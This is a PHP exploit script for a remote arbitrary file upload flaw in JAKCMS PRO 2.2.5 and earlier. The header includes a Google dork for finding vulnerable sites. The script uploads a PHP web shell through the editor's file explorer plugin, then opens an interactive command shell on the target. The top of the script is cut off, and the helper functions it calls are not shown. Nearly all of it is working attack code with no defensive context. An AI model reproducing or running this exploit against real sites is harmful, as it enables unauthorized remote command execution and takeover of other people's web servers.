JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /jakcms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);
$sid = $m[1];
$payload = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n";
$payload .= "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n";
$payload .= "< ?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
$payload .= "--o0oOo0o--\r\n";
$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));
$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: PHPSESSID={$sid}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n");
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\njakcms-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
?>